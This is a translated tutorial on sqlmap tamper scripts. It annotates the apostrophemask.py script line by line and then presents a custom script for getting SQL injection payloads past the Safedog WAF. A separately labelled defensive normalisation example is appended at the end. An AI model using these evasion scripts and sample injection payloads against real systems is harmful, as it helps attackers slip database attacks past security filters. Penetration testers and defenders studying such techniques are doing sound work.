
What are the rules for writing sqlmap tamper?

2025-01-24 Update. From: SLTechnology News&Howtos (shulou), Network Security


Shulou(Shulou.com)05/31 Report--

This article introduces the rules for writing sqlmap tamper scripts. Many people run into this problem in real cases, so let the editor walk you through how to handle it. I hope you read it carefully and get something out of it!

Introduction to Sqlmap

Sqlmap is an open source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities and the takeover of database servers. It has a powerful detection engine and feature options for testing many types of databases, including fetching the data stored in the database, accessing files on the operating system and even executing operating system commands through out-of-band connections. This article focuses on the specific directory structure of the sqlmap software; later articles will also explain the various encoding results of sqlmap starting from its source code. From the structure we can see the beauty of software engineering in sqlmap, and from the rigorous classification and construction of its directory tree we can see the beauty of a large but simple structure in the way sqlmap was developed.

Tamper script

When we download the sqlmap installation package, unzip it and enter the sqlmap folder, we find the folder tamper under it, which contains many scripts aimed at WAFs, for example 360, Green League WAF, modsecurity, Baidu, fortiweb and cloudflare. It can be seen that foreign developers also know the domestic WAFs, and that they quietly bypass them.

Analyze tamper script

Because there are so many tamper scripts in the tamper folder, space does not allow analysing all of them, so one of the more commonly used ones, apostrophemask.py, is chosen as the sample. What it does is replace ' with %EF%BC%87.

The reference material for this script is actually the URL encoding table; open it and you can see the mapping.

The script starts with #!/usr/bin/env python: env looks up the python interpreter on the PATH and runs the script with it, which is good practice. The text enclosed in triple double quotes (the copyright notice "Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission") is a multi-line docstring and has no effect on execution. from lib.core.enums import PRIORITY imports PRIORITY from lib/core/enums.py in sqlmap (PRIORITY.LOWEST = -100; see enums.py for the other levels), and __priority__ = PRIORITY.LOWEST sets this script's priority to the lowest level. dependencies() is kept so that the script matches the structure of every other tamper script; its body is pass, which does nothing and only serves as a placeholder that keeps the program structure complete. tamper(payload, **kwargs) is the tamper function itself: payload is the string to transform and **kwargs is a dictionary of keyword arguments, similar to {'a': 1, 'b': 3, 'c': 2}. Its docstring describes what the script does (' -> %EF%BC%87), lists the references (the UTF-8 table that shows the single quotation mark being url-encoded) and gives a usage example. The function body returns payload.replace("'", "%EF%BC%87") when payload is non-empty and payload unchanged otherwise. The whole script, with comments:

```python
#!/usr/bin/env python
# env looks up the python interpreter on the PATH and runs this script with it

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# the triple-quoted block above is a multi-line docstring (the copyright notice)

from lib.core.enums import PRIORITY
# PRIORITY lives in lib/core/enums.py; LOWEST = -100, see enums.py for the rest

__priority__ = PRIORITY.LOWEST  # priority of this tamper script: the lowest level


def dependencies():
    # kept for consistency with the structure of every tamper script
    pass  # does nothing; a placeholder that keeps the structure complete


def tamper(payload, **kwargs):
    """
    Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)

    References:
        * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
        * http://lukasz.pilorz.net/testy/unicode_conversion/
        * http://sla.ckers.org/forum/read.php?13,11562,11850
        * http://lukasz.pilorz.net/testy/full_width_utf/index.phps

    >>> tamper("1 AND '1'='1")
    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
    """
    # payload is the string to transform; **kwargs is a dict of keyword
    # arguments, similar to {'a': 1, 'b': 3, 'c': 2}

    # replace every ' with %EF%BC%87 and return the payload (unchanged if empty)
    return payload.replace('\'', "%EF%BC%87") if payload else payload
```

Write a tamper script

Here we try to write a tamper script to bypass Safedog. After all, Safedog is quite good in the server security field and is still free; there are versions for Linux and Windows, and it is updated all the time.

The header and skeleton can be copied directly from any other tamper script; only the priority, the description and the body of tamper() change.

```python
#!/usr/bin/env python
# the header and skeleton can be copied and pasted directly from other tampers

"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission

v0.0.1 August 21, 2016
script description
"""

from lib.core.enums import PRIORITY
# PRIORITY is defined in lib/core/enums.py (LOWEST = -100, LOWER = -50, ...)

__priority__ = PRIORITY.LOW  # priority of this tamper script: the low level


def dependencies():
    # kept for consistency with the structure of every tamper script
    pass  # does nothing; a placeholder that keeps the structure complete


def tamper(payload, **kwargs):
    """
    To bypass safedog
    Replaces space character (' ') with plus ('/*|%20--%20|*/')

    >>> tamper('SELECT id FROM users')
    'SELECT/*|%20--%20|*/id/*|%20--%20|*/FROM/*|%20--%20|*/users'
    """
    # **kwargs is a dict of keyword arguments, similar to {'a': 1, 'b': 3}
    # the filler /*|%20--%20|*/ is an inline comment wrapping a SQL line comment

    retVal = payload  # intermediate result; returned unchanged if payload is empty

    if payload:
        retVal = ""
        # state flags, so that spaces inside quoted strings are left alone
        quote, doublequote, firstspace = False, False, False

        for i in range(len(payload)):  # walk the payload character by character
            if not firstspace:
                # the first space in the payload is replaced unconditionally
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*|%20--%20|*/"
                    continue

            elif payload[i] == '\'':
                quote = not quote  # entering or leaving a single-quoted string

            elif payload[i] == '"':
                doublequote = not doublequote  # entering or leaving a double-quoted string

            elif payload[i] == " " and not doublequote and not quote:
                # a space outside any quoted string is replaced with the filler
                retVal += "/*|%20--%20|*/"
                continue

            retVal += payload[i]  # every other character is copied as-is

    return retVal  # the reassembled payload
```
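As an added example, not code from this article or from sqlmap: the two transformations walked through above (the full-width apostrophe %EF%BC%87 standing in for ', and an inline-comment filler of the form /*|%20--%20|*/ standing in for a space) can be folded back to plain SQL on the receiving side before any rule is matched, which is what a WAF or a log-review pipeline needs in order not to be fooled by them. The sample payloads, the tautology rule and the function names are constructed for this illustration, and the -- inside the filler is an assumption.

```python
import re
import unicodedata
from urllib.parse import unquote

# Constructed sample inputs: tampered forms of the two payloads used in the
# article, plus a benign value that legitimately contains an apostrophe.
APOSTROPHE_MASKED = "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871"
SPACE_COMMENTED = "SELECT/*|%20--%20|*/id/*|%20--%20|*/FROM/*|%20--%20|*/users"
BENIGN = "O%27Reilly"

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Deliberately simple rule standing in for a WAF signature: a quoted tautology
# such as '1'='1'. Matching it against the raw bytes is what the tampers defeat.
TAUTOLOGY = re.compile(r"'(\w+)'\s*=\s*'\1")


def normalize_payload(raw: str) -> str:
    """Canonicalize a request parameter before any signature is applied.

    1. percent-decode twice, so double encoding does not survive either;
    2. NFKC-fold, which maps full-width U+FF07 (the %EF%BC%87 apostrophe) and
       the rest of the U+FF01..U+FF5E block back onto ASCII;
    3. collapse /* ... */ inline comments, including the |%20--%20| filler,
       to a single space;
    4. collapse whitespace runs so 'SELECT  id' and 'SELECT id' compare equal.
    """
    text = unquote(unquote(raw))
    text = unicodedata.normalize("NFKC", text)
    text = INLINE_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()


def looks_injected(raw: str, normalize: bool = True) -> bool:
    """Apply the rule to the normalized form (or to the raw string, for comparison)."""
    text = normalize_payload(raw) if normalize else raw
    return bool(TAUTOLOGY.search(text))


if __name__ == "__main__":
    for sample in (APOSTROPHE_MASKED, SPACE_COMMENTED, BENIGN):
        print(f"{sample!r:62} -> {normalize_payload(sample)!r}  "
              f"raw rule: {looks_injected(sample, normalize=False)}  "
              f"normalized rule: {looks_injected(sample)}")
```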
